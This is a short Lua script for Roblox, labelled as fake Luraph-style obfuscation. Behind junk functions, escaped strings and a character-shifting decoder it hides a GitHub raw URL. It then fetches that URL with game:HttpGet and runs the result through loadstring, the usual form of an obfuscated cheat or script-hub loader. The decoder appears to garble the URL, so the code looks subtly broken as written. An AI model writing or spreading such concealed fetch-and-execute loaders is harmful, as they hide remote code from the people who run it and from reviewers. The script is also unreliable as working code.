-- Fake Luraph-style heavy obfuscation
local b=(''):rep;local c=setmetatable;local d=string.char;local e=string.byte;local f=string.sub;local g=pcall;
local h='\114\101\113\117\105\114\101';local i=loadstring or function(j)return assert(load(j))end
local k="A%5FQ11b%2B7g1";local function l(m)
    local n='' for o=1,#m do n=n..d((e(f(m,o,o))+o)%256) end;return n end
local function p()return 1+1 end;local function q()return 2*2 end
local function r()return 3/3 end;local function s()return p()*q()-r()end
local u=l("\108\111\97\100\115\116\114\105\110\103");local v=l("\103\97\109\101\58\72\116\116\112\71\101\116");
local w=l("\104\116\116\112\115\58\47\47\114\97\119\46\103\105\116\104\117\98\117\115\101\114\99\111\110\116\101\110\116\46\99\111\109\47\78\111\118\97\83\99\114\105\112\116\101\114\47\78\111\118\97\68\101\109\111\47\114\101\102\115\47\104\101\97\100\115\47\109\97\105\110\47\77\101\110\117");
g(function()
    local x=_G["\108\111\97\100\115\116\114\105\110\103"](game:HttpGet(w,true))
    x()
end)
